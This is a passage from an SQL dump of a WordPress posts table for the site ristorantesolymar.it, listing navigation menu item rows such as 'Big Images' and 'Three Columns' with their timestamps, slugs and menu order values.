16:06:24','',0,'https://www.ristorantesolymar.it/2020/12/05/big-slider/',65,'nav_menu_item','',0),(3212,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Small Images','','publish','closed','closed','','small-images','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',0,'https://www.ristorantesolymar.it/2020/12/05/small-images/',64,'nav_menu_item','',0),(3213,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Big Images','','publish','closed','closed','','big-images','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',0,'https://www.ristorantesolymar.it/2020/12/05/big-images/',63,'nav_menu_item','',0),(3214,1,'2020-12-05 17:06:24','2020-12-05 16:06:24','','Big Gallery','','publish','closed','closed','','big-gallery','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',0,'https://www.ristorantesolymar.it/2020/12/05/big-gallery/',67,'nav_menu_item','',0),(3215,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3215','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',0,'https://www.ristorantesolymar.it/2020/12/05/3215/',6,'nav_menu_item','',0),(3216,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3216','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',0,'https://www.ristorantesolymar.it/2020/12/05/3216/',6,'nav_menu_item','',0),(3217,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3217','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3217/',70,'nav_menu_item','',0),(3218,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3218','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3218/',97,'nav_menu_item','',0),(3219,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3219','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3219/',98,'nav_menu_item','',0),(3220,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3220','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3220/',26,'nav_menu_item','',0),(3221,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3221','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3221/',53,'nav_menu_item','',0),(3222,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3222','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3222/',54,'nav_menu_item','',0),(3223,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3223','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3223/',27,'nav_menu_item','',0),(3224,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3224','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3224/',71,'nav_menu_item','',0),(3225,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3225','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3225/',73,'nav_menu_item','',0),(3226,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3226','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3226/',29,'nav_menu_item','',0),(3227,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3227','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3227/',43,'nav_menu_item','',0),(3228,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3228','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3228/',36,'nav_menu_item','',0),(3229,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3229','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3229/',44,'nav_menu_item','',0),(3230,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3230','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3230/',80,'nav_menu_item','',0),(3231,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3231','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3231/',88,'nav_menu_item','',0),(3232,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3232','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3232/',87,'nav_menu_item','',0),(3233,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3233','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3233/',79,'nav_menu_item','',0),(3234,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3234','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3234/',35,'nav_menu_item','',0),(3235,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3235','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3235/',30,'nav_menu_item','',0),(3236,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3236','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3236/',74,'nav_menu_item','',0),(3237,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3237','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3237/',81,'nav_menu_item','',0),(3238,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3238','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3238/',37,'nav_menu_item','',0),(3239,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3239','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3239/',28,'nav_menu_item','',0),(3240,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3240','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3240/',47,'nav_menu_item','',0),(3241,1,'2020-12-05 17:06:24','2020-12-05 16:06:24',' ','','','publish','closed','closed','','3241','','','2020-12-05 17:06:24','2020-12-05 16:06:24','',3039,'https://www.ristorantesolymar.it/2020/12/05/3241/',72,'nav_menu_item','',0),(3242,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3242','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3242/',91,'nav_menu_item','',0),(3243,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3243','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3243/',23,'nav_menu_item','',0),(3250,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3250','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3250/',82,'nav_menu_item','',0),(3251,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3251','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3251/',38,'nav_menu_item','',0),(3252,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3252','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3252/',75,'nav_menu_item','',0),(3253,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3253','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3253/',31,'nav_menu_item','',0),(3254,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3254','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3254/',5,'nav_menu_item','',0),(3255,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3255','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3255/',3,'nav_menu_item','',0),(3256,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3256','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3256/',92,'nav_menu_item','',0),(3257,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3257','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3257/',99,'nav_menu_item','',0),(3258,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3258','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3258/',48,'nav_menu_item','',0),(3259,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3259','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3259/',55,'nav_menu_item','',0),(3260,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3260','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3260/',7,'nav_menu_item','',0),(3261,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3261','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3261/',10,'nav_menu_item','',0),(3262,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3262','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3262/',8,'nav_menu_item','',0),(3263,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3263','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3263/',9,'nav_menu_item','',0),(3264,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3264','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3061,'https://www.ristorantesolymar.it/2020/12/05/3264/',12,'nav_menu_item','',0),(3265,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3265','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3061,'https://www.ristorantesolymar.it/2020/12/05/3265/',13,'nav_menu_item','',0),(3266,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3266','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3061,'https://www.ristorantesolymar.it/2020/12/05/3266/',14,'nav_menu_item','',0),(3267,1,'2020-12-05 17:06:25','2020-12-05 16:06:25','','Standard List','','publish','closed','closed','','standard-list','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/standard-list/',16,'nav_menu_item','',0),(3272,1,'2020-12-05 17:06:25','2020-12-05 16:06:25','','Standard List','','publish','closed','closed','','standard-list-2','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/standard-list-2/',12,'nav_menu_item','',0),(3273,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3273','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3273/',7,'nav_menu_item','',0),(3274,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3274','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3274/',8,'nav_menu_item','',0),(3275,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3275','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3275/',9,'nav_menu_item','',0),(3276,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3276','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',0,'https://www.ristorantesolymar.it/2020/12/05/3276/',10,'nav_menu_item','',0),(3277,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3277','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3277/',46,'nav_menu_item','',0),(3278,1,'2020-12-05 17:06:25','2020-12-05 16:06:25',' ','','','publish','closed','closed','','3278','','','2020-12-05 17:06:25','2020-12-05 16:06:25','',3039,'https://www.ristorantesolymar.it/2020/12/05/3278/',45,'nav_menu_item','',0),(3279,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3279','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3279/',90,'nav_menu_item','',0),(3280,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3280','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3280/',89,'nav_menu_item','',0),(3281,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3281','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3281/',56,'nav_menu_item','',0),(3282,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3282','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3282/',100,'nav_menu_item','',0),(3283,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3283','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3283/',83,'nav_menu_item','',0),(3284,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3284','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3284/',39,'nav_menu_item','',0),(3285,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3285','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3285/',12,'nav_menu_item','',0),(3286,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3286','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3286/',18,'nav_menu_item','',0),(3287,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3287','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3287/',21,'nav_menu_item','',0),(3288,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3288','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3288/',16,'nav_menu_item','',0),(3289,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3289','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3289/',14,'nav_menu_item','',0),(3290,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3290','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3290/',17,'nav_menu_item','',0),(3291,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3291','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3291/',20,'nav_menu_item','',0),(3292,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3292','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3292/',19,'nav_menu_item','',0),(3293,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3293','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3293/',15,'nav_menu_item','',0),(3294,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3294','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3294/',93,'nav_menu_item','',0),(3295,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3295','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3295/',49,'nav_menu_item','',0),(3296,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3296','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3296/',57,'nav_menu_item','',0),(3297,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3297','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3297/',101,'nav_menu_item','',0),(3298,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3298','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3298/',76,'nav_menu_item','',0),(3299,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3299','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',3039,'https://www.ristorantesolymar.it/2020/12/05/3299/',32,'nav_menu_item','',0),(3300,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3300','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3300/',14,'nav_menu_item','',0),(3307,1,'2020-12-05 17:06:26','2020-12-05 16:06:26','','Small Slider','','publish','closed','closed','','small-slider','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/small-slider/',66,'nav_menu_item','',0),(3308,1,'2020-12-05 17:06:26','2020-12-05 16:06:26',' ','','','publish','closed','closed','','3308','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/3308/',4,'nav_menu_item','',0),(3309,1,'2020-12-05 17:06:26','2020-12-05 16:06:26','','Big Images','','publish','closed','closed','','big-images-2','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/big-images-2/',40,'nav_menu_item','',0),(3310,1,'2020-12-05 17:06:26','2020-12-05 16:06:26','','Small Images','','publish','closed','closed','','small-images-2','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/small-images-2/',41,'nav_menu_item','',0),(3311,1,'2020-12-05 17:06:26','2020-12-05 16:06:26','','Big Slider','','publish','closed','closed','','big-slider-2','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/big-slider-2/',42,'nav_menu_item','',0),(3312,1,'2020-12-05 17:06:26','2020-12-05 16:06:26','','Small Slider','','publish','closed','closed','','small-slider-2','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/small-slider-2/',43,'nav_menu_item','',0),(3313,1,'2020-12-05 17:06:26','2020-12-05 16:06:26','','Big Gallery','','publish','closed','closed','','big-gallery-2','','','2020-12-05 17:06:26','2020-12-05 16:06:26','',0,'https://www.ristorantesolymar.it/2020/12/05/big-gallery-2/',44,'nav_menu_item','',0),(3314,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3314','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3314/',50,'nav_menu_item','',0),(3315,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3315','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3315/',94,'nav_menu_item','',0),(3316,1,'2020-12-05 17:06:27','2020-12-05 16:06:27','','Single Types','','publish','closed','closed','','single-types-3','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',0,'https://www.ristorantesolymar.it/2020/12/05/single-types-3/',24,'nav_menu_item','',0),(3317,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3317','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',0,'https://www.ristorantesolymar.it/2020/12/05/3317/',16,'nav_menu_item','',0),(3318,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3318','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',0,'https://www.ristorantesolymar.it/2020/12/05/3318/',15,'nav_menu_item','',0),(3319,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3319','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',0,'https://www.ristorantesolymar.it/2020/12/05/3319/',25,'nav_menu_item','',0),(3320,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3320','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',0,'https://www.ristorantesolymar.it/2020/12/05/3320/',24,'nav_menu_item','',0),(3321,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3321','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3321/',48,'nav_menu_item','',0),(3322,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3322','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3322/',25,'nav_menu_item','',0),(3323,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3323','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3323/',23,'nav_menu_item','',0),(3324,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3324','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3324/',51,'nav_menu_item','',0),(3325,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3325','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3325/',50,'nav_menu_item','',0),(3326,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3326','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3326/',53,'nav_menu_item','',0),(3327,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3327','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3327/',52,'nav_menu_item','',0),(3328,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3328','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3328/',29,'nav_menu_item','',0),(3329,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3329','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3329/',28,'nav_menu_item','',0),(3330,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3330','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3330/',27,'nav_menu_item','',0),(3331,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3331','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3331/',30,'nav_menu_item','',0),(3332,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3332','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3332/',37,'nav_menu_item','',0),(3333,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3333','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3333/',60,'nav_menu_item','',0),(3334,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3334','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3334/',77,'nav_menu_item','',0),(3335,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3335','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3335/',33,'nav_menu_item','',0),(3336,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3336','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3336/',40,'nav_menu_item','',0),(3337,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3337','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3337/',41,'nav_menu_item','',0),(3338,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3338','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3338/',84,'nav_menu_item','',0),(3339,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3339','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3039,'https://www.ristorantesolymar.it/2020/12/05/3339/',85,'nav_menu_item','',0),(3340,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3340','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3340/',47,'nav_menu_item','',0),(3341,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3341','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3341/',46,'nav_menu_item','',0),(3342,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3342','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3342/',22,'nav_menu_item','',0),(3343,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3343','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3343/',21,'nav_menu_item','',0),(3344,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3344','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3344/',24,'nav_menu_item','',0),(3345,1,'2020-12-05 17:06:27','2020-12-05 16:06:27',' ','','','publish','closed','closed','','3345','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/3345/',23,'nav_menu_item','',0),(3346,1,'2020-12-05 17:06:27','2020-12-05 16:06:27','','Three Columns','','publish','closed','closed','','three-columns-2','','','2020-12-05 17:06:27','2020-12-05 16:06:27','',3061,'https://www.ristorantesolymar.it/2020/12/05/three-columns-2/',32,'nav_menu_item','',0),(3347,1,'2020-12-05 17:06:27','2020-12-05 16:06:27','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-2','','','2020-12-05 17:06:27','2020-12-05 